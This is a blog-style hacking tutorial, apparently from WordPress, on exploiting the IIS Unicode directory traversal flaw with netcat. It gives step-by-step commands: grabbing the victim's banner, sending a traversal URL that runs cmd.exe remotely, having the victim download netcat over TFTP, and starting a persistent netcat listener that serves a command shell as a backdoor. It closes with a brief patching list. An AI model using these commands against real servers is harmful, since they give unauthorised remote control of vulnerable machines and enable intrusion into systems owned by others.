Netcat Tutorial | Directory Transversal Attack

In last post we had our look on directory transversal Unicode vulnerability and what is it, in this tutorial to netcat we will see how you can use netcat to exploit it. Before we proceed I want to make clear this is one the most known attack style on IIS server using netcat and no doubt you may find this tutorial as it is in many books related to hacking web servers so if you have already read that then this will surely be nothing new for you. Ok lets proceed to tutorial.
First of all you must be clear that the server is running vulnerable IIS server so you’ll have to perform some banner grabbing after scanning ports of victim. Or you can grab banner using netcat by using following command,
C:\>nc –v –n IP_address port_number
Once you are confirmed that victim is running vulnerable IIS server. Now its time to check whether the victim supports malformed URL, to do so we will send malformed URL to victim by using following command,
GET http://IP_address/scripts/..%255c ../wininit/system32/cmd.exe?/c+dir+c:
If it gives output as above then the victim is vulnerable. Now its time to backdoor netcat by uploading it to vulnerable server. Netcat can be uploaded using TFTP, integrate TFTP with exploit URL,
GET http://IP_address/scripts/..%255c ../wininit/system32/cmd.exe?/c+TFTP+-i+IP_address+GET+nc
Once netcat is uploaded we can use it as backdoor. Read netcat tutorial on backdoor. Now run following command on victim using same exploit URL,
nc –L –p port –d –e cmd.exe
Once done its your time to play inside.
Countermeasure:
-Update to Windows 2000 SP3 if you are using still using Windows 2000 server.
-Apply patches in Windows 2003
-Better update IIS server to IIS 7
Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s